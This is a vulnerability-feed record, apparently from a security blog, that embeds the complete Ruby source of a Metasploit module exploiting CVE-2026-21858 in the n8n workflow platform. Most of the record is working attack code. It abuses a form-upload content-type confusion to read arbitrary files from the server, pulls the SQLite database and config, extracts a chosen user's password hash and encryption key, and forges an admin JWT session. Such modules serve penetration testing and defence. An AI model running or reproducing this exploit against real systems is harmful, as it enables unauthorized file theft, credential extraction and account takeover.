{“lastseen”:”2026-02-16T19:28:06″,”description”:”This module exploits CVE-2026-21858, a critical unauthenticated remote code execution vulnerability in n8n workflow automation platform versions 1.65.0 through 1.120.x. The vulnerability, dubbed \\”Ni8mare\\”, is a content-type confusion flaw in webhook…”,”published”:”2026-02-16T18:59:46″,”modified”:”2026-02-16T18:59:46″,”type”:”metasploit”,”title”:”n8n arbitrary file read”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-GATHER-NI8MARE_CVE_2026_21858-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-21858″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\nrequire ‘sqlite3’\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::Remote::HttpClient\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘n8n arbitrary file read’,\\n ‘Description’ =\\u003e ‘This module exploits CVE-2026-21858, a critical unauthenticated remote code execution vulnerability in n8n workflow automation platform versions 1.65.0 through 1.120.x. The vulnerability, dubbed \\”Ni8mare\\”, is a content-type confusion flaw in webhook request handling that allows attackers to achieve arbitrary file read.’,\\n ‘Author’ =\\u003e [\\n ‘dor attias’, # research\\n ‘msutovsky-r7’ # module\\n ],\\n ‘Actions’ =\\u003e [\\n [‘READ_FILE’, { ‘Description’ =\\u003e ‘Read an arbitrary file from the target’ }],\\n [‘EXTRACT_SESSION’, { ‘Description’ =\\u003e ‘Create an admin JWT session key by reading out secrets’ }]\\n ],\\n ‘DefaultAction’ =\\u003e ‘EXTRACT_SESSION’,\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS]\\n }\\n )\\n )\\n register_options([\\n OptString.new(‘TARGET_EMAIL’, [false, ‘A target user for spoofed session, when EXTRACT_ADMIN_SESSION action is set’], conditions: [‘ACTION’, ‘==’, ‘EXTRACT_SESSION’]),\\n OptString.new(‘N8N_CONFIG_DIR’, [false, ‘Absolute path to n8n config directory’, ‘\/home\/node\/.n8n\/’], conditions: [‘ACTION’, ‘==’, ‘EXTRACT_SESSION’]),\\n OptString.new(‘TARGET_FILENAME’, [false, ‘A target filename, when READ_FILE action is set’], conditions: [‘ACTION’, ‘==’, ‘READ_FILE’]),\\n OptString.new(‘USERNAME’, [true, ‘Username of n8n (email address)’]),\\n OptString.new(‘PASSWORD’, [true, ‘Password of n8n’])\\n ])\\n end\\n\\n def content_type_confusion_upload(form_uri, filename)\\n extraction_filename = \\”#{Rex::Text.rand_text_alpha(rand(8..11))}.pdf\\”\\n json_data = {\\n files: {\\n \\”field-0\\”:\\n {\\n filepath: filename,\\n originalFilename: extraction_filename,\\n mimeType: ‘text\/plain’,\\n extenstion: ”\\n }\\n },\\n data: [\\n Rex::Text.rand_text_alpha(12)\\n ],\\n executionId: Rex::Text.rand_text_alpha(12)\\n }\\n res = send_request_cgi({\\n ‘uri’ =\\u003e normalize_uri(‘form-test’, form_uri),\\n ‘method’ =\\u003e ‘POST’,\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘data’ =\\u003e json_data.to_json\\n })\\n\\n fail_with(Failure::UnexpectedReply, ‘Received unexpected response’) unless res\\u0026.code == 200\\n\\n json_res = res.get_json_document\\n\\n fail_with(Failure::PayloadFailed, ‘Failed to load target file’) unless json_res[‘status’] != ‘200’\\n end\\n\\n def login\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘login’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘data’ =\\u003e {\\n ’emailOrLdapLoginId’ =\\u003e datastore[‘USERNAME’],\\n ’email’ =\\u003e datastore[‘USERNAME’],\\n ‘password’ =\\u003e datastore[‘PASSWORD’]\\n }.to_json\\n )\\n return false unless res\\n return true if res\\u0026.code == 200\\n\\n json_data = res.get_json_document\\n\\n print_error(\\”Login failed: #{json_data[‘message’]}\\”)\\n\\n false\\n end\\n\\n def create_file_upload_workflow\\n @workflow_name = \\”workflow_#{Rex::Text.rand_text_alphanumeric(8)}\\”\\n random_uuid = SecureRandom.uuid.strip\\n workflow_data = {\\n ‘name’ =\\u003e @workflow_name,\\n ‘active’ =\\u003e false,\\n ‘settings’ =\\u003e {\\n ‘saveDataErrorExecution’ =\\u003e ‘all’,\\n ‘saveDataSuccessExecution’ =\\u003e ‘all’,\\n ‘saveManualExecutions’ =\\u003e true,\\n ‘executionOrder’ =\\u003e ‘v1’\\n },\\n nodes: [\\n {\\n parameters: {\\n formTitle: Rex::Text.rand_text_alphanumeric(8),\\n formFields: {\\n values: [\\n {\\n fieldLabel: Rex::Text.rand_text_alphanumeric(8),\\n fieldType: ‘file’\\n }\\n ]\\n },\\n options: {}\\n },\\n type: ‘n8n-nodes-base.formTrigger’,\\n typeVersion: 2.3,\\n position: [0, 0],\\n id: ‘e4f12efa-9975-4041-b71f-0ce4999ec5a7’,\\n name: ‘On form submission’,\\n webhookId: random_uuid\\n }\\n ],\\n ‘connections’ =\\u003e {},\\n settings: { executionOrder: ‘v1’ }\\n }\\n\\n print_status(‘Creating file upload workflow…’)\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘workflows’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘data’ =\\u003e workflow_data.to_json\\n )\\n fail_with(Failure::UnexpectedReply, \\”Failed to create workflow: #{res\\u0026.code}\\”) unless res\\u0026.code == 200 || res.code == 201\\n\\n json = res.get_json_document\\n\\n @workflow_id = json.dig(‘data’, ‘id’) || json[‘id’]\\n nodes = json.dig(‘data’, ‘nodes’)\\n version_id = json.dig(‘data’, ‘versionId’)\\n id = json.dig(‘data’, ‘id’)\\n\\n fail_with(Failure::NotFound, ‘Failed to get workflow ID from response’) unless @workflow_id \\u0026\\u0026 nodes \\u0026\\u0026 version_id \\u0026\\u0026 id\\n\\n activation_data = {\\n ‘workflowData’ =\\u003e {\\n ‘name’ =\\u003e @workflow_name,\\n ‘nodes’ =\\u003e nodes,\\n ‘pinData’ =\\u003e {},\\n ‘connections’ =\\u003e {},\\n ‘active’ =\\u003e false,\\n ‘settings’ =\\u003e {\\n ‘saveDataErrorExecution’ =\\u003e ‘all’,\\n ‘saveDataSuccessExecution’ =\\u003e ‘all’,\\n ‘saveManualExecutions’ =\\u003e true,\\n ‘executionOrder’ =\\u003e ‘v1’\\n },\\n ‘tags’ =\\u003e [],\\n ‘versionId’ =\\u003e version_id,\\n ‘meta’ =\\u003e ‘null’,\\n ‘id’ =\\u003e id\\n },\\n startNodes: [\\n {\\n name: ‘On form submission’,\\n sourceData: ‘null’\\n }\\n ],\\n destinationNode: ‘On form submission’\\n }\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘workflows’, @workflow_id.to_s, ‘run’),\\n ‘ctype’ =\\u003e ‘application\/json’,\\n ‘keep_cookies’ =\\u003e true,\\n ‘data’ =\\u003e activation_data.to_json\\n )\\n\\n fail_with(Failure::UnexpectedReply, ‘Workflow may not run, received unexpected reply’) unless res\\u0026.code == 200\\n\\n json_data = res.get_json_document\\n\\n fail_with(Failure::PayloadFailed, ‘Failed to run workflow’) unless json_data.dig(‘data’, ‘waitingForWebhook’) == true\\n random_uuid\\n end\\n\\n def get_run_id\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(‘rest’, ‘executions’),\\n ‘vars_get’ =\\u003e\\n {\\n ‘filter’ =\\u003e %({\\”workflowId\\”:\\”#{@workflow_id}\\”}),\\n ‘limit’ =\\u003e 10\\n }\\n })\\n fail_with(Failure::UnexpectedReply, ‘Received unexpected reply, could not get run ID’) unless res\\u0026.code == 200\\n\\n json_data = res.get_json_document\\n\\n run_id = json_data.dig(‘data’, ‘results’, 0, ‘id’)\\n fail_with(Failure::Unknown, ‘Failed to get run ID, workflow might not run’) unless run_id\\n\\n run_id\\n end\\n\\n def archive_workflow\\n print_status(\\”Cleaning up workflow #{@workflow_id}…\\”)\\n\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘workflows’, @workflow_id.to_s, ‘archive’),\\n ‘keep_cookies’ =\\u003e true\\n )\\n\\n return false unless res\\u0026.code == 200\\n\\n json_data = res.get_json_document\\n\\n return false unless json_data.dig(‘data’, ‘id’) == @workflow_id\\n\\n true\\n end\\n\\n def valid_username?(username)\\n \/\\\\A[\\\\w+\\\\-.]+@[a-z\\\\d-]+(\\\\.[a-z\\\\d-]+)*\\\\.[a-z]+\\\\z\/i =~ username\\n end\\n\\n def delete_workflow\\n res = send_request_cgi(\\n ‘method’ =\\u003e ‘DELETE’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘rest’, ‘workflows’, @workflow_id.to_s)\\n )\\n\\n return false unless res\\u0026.code == 200\\n\\n json_data = res.get_json_document\\n\\n return false unless json_data[‘data’] == true\\n\\n true\\n end\\n\\n def extract_content(run_id)\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(‘rest’, ‘executions’, run_id)\\n })\\n\\n fail_with(Failure::UnexpectedReply, ‘Failed to get information about execution, received unexpected reply’) unless res\\u0026.code == 200\\n\\n json_data = res.get_json_document\\n\\n file_data = json_data.dig(‘data’, ‘data’)\\n\\n fail_with(Failure::PayloadFailed, ‘Failed to read the file’) unless file_data\\n\\n parsed_file_data = parse_json_data(file_data)\\n\\n file_content_enc = parsed_file_data[29]\\n\\n fail_with(Failure::NotFound, ‘File not found’) unless file_content_enc\\n\\n file_content = ::Base64.decode64(file_content_enc)\\n\\n file_content\\n end\\n\\n def parse_json_data(data)\\n begin\\n parsed_file_data = JSON.parse(data)\\n rescue JSON::ParserError\\n fail_with(Failure::Unknown, ‘Failed to parse JSON data’)\\n end\\n parsed_file_data\\n end\\n\\n def read_file(filename)\\n form_uri = create_file_upload_workflow\\n\\n content_type_confusion_upload(form_uri, filename)\\n\\n run_id = get_run_id\\n\\n file_content = extract_content(run_id)\\n\\n if !archive_workflow\\n print_warning(‘Could not archive workflow, workflow might need to be archived and deleted manually’)\\n return file_content\\n end\\n\\n if !delete_workflow\\n print_warning(‘Could not deleted workflow, workflow might need to be deleted manually’)\\n return file_content\\n end\\n\\n file_content\\n end\\n\\n def run\\n fail_with(Failure::BadConfig, ‘Username should be valid email’) unless valid_username?(datastore[‘USERNAME’])\\n fail_with(Failure::NoAccess, ‘Failed to login’) unless login\\n\\n case action.name\\n when ‘READ_FILE’\\n target_filename = datastore[‘TARGET_FILENAME’]\\n fail_with(Failure::BadConfig, ‘Filename needs to be set’) if target_filename.blank?\\n file_content = read_file(target_filename)\\n\\n stored_path = store_loot(target_filename, ‘text\/plain’, datastore[‘rhosts’], file_content)\\n print_good(\\”Results saved to: #{stored_path}\\”)\\n\\n when ‘EXTRACT_SESSION’\\n target_email = datastore[‘TARGET_EMAIL’]\\n\\n fail_with(Failure::BadConfig, ‘Target email needs to be set’) if target_email.blank?\\n fail_with(Failure::BadConfig, ‘Target email should be valid email’) unless valid_username?(target_email)\\n\\n db_content = read_file(\\”#{datastore[‘N8N_CONFIG_DIR’]}\/database.sqlite\\”)\\n\\n fail_with(Failure::NotFound, ‘Could not found database file’) unless db_content\\n\\n db_loot_name = store_loot(‘database.sqlite’, ‘application\/x-sqlite3’, datastore[‘rhosts’], db_content)\\n\\n print_good(\\”Database saved to: #{db_loot_name}\\”)\\n\\n db = SQLite3::Database.new(db_loot_name)\\n\\n user_id = db.execute(%(select id from user where email=’#{target_email}’)).dig(0, 0)\\n password_hash = db.execute(%(select password from user where email=’#{target_email}’)).dig(0, 0)\\n\\n fail_with(Failure::NotFound, \\”Could not found #{target_email} in database\\”) unless user_id \\u0026\\u0026 password_hash\\n\\n print_good(\\”Extracted user ID: #{user_id}\\”)\\n print_good(\\”Extracted password hash: #{password_hash}\\”)\\n\\n store_valid_credential(\\n user: target_email,\\n private: password_hash\\n )\\n\\n config_content = read_file(\\”#{datastore[‘N8N_CONFIG_DIR’]}\/config\\”)\\n\\n fail_with(Failure::NotFound, ‘Could not found config file’) unless config_content\\n\\n config_name = store_loot(‘n8n.config’, ‘plain\/text’, datastore[‘rhosts’], config_content)\\n print_good(\\”Config file saved to: #{config_name}\\”)\\n\\n config_content_json = parse_json_data(config_content)\\n encryption_key = config_content_json[‘encryptionKey’]\\n\\n print_good(\\”Extracted encryption key: #{encryption_key}\\”)\\n\\n encryption_key = (0…encryption_key.length).step(2).map { |i| encryption_key[i] }\\n encryption_key = encryption_key.join(”)\\n\\n jwt_payload = %({\\”id\\”:\\”#{user_id}\\”,\\”hash\\”:\\”#{Base64.urlsafe_encode64(Digest::SHA256.digest(\\”#{target_email}:#{password_hash}\\”))[0..9]}\\”})\\n\\n jwt_ticket = Msf::Exploit::Remote::HTTP::JWT.encode(jwt_payload.to_s, OpenSSL::Digest::SHA256.hexdigest(encryption_key))\\n\\n print_good(\\”JWT ticket as #{target_email}: #{jwt_ticket}\\”)\\n\\n end\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/gather\/ni8mare_cve_2026_21858.rb”,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/gather\/ni8mare_cve_2026_21858\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-16T19:28:06″,”description”:”This module exploits CVE-2026-21858, a critical unauthenticated remote code execution vulnerability in n8n workflow automation platform versions 1.65.0 through 1.120.x. The vulnerability, dubbed \\”Ni8mare\\”, is…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,169,13,7,11,5],"class_list":["post-41071","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n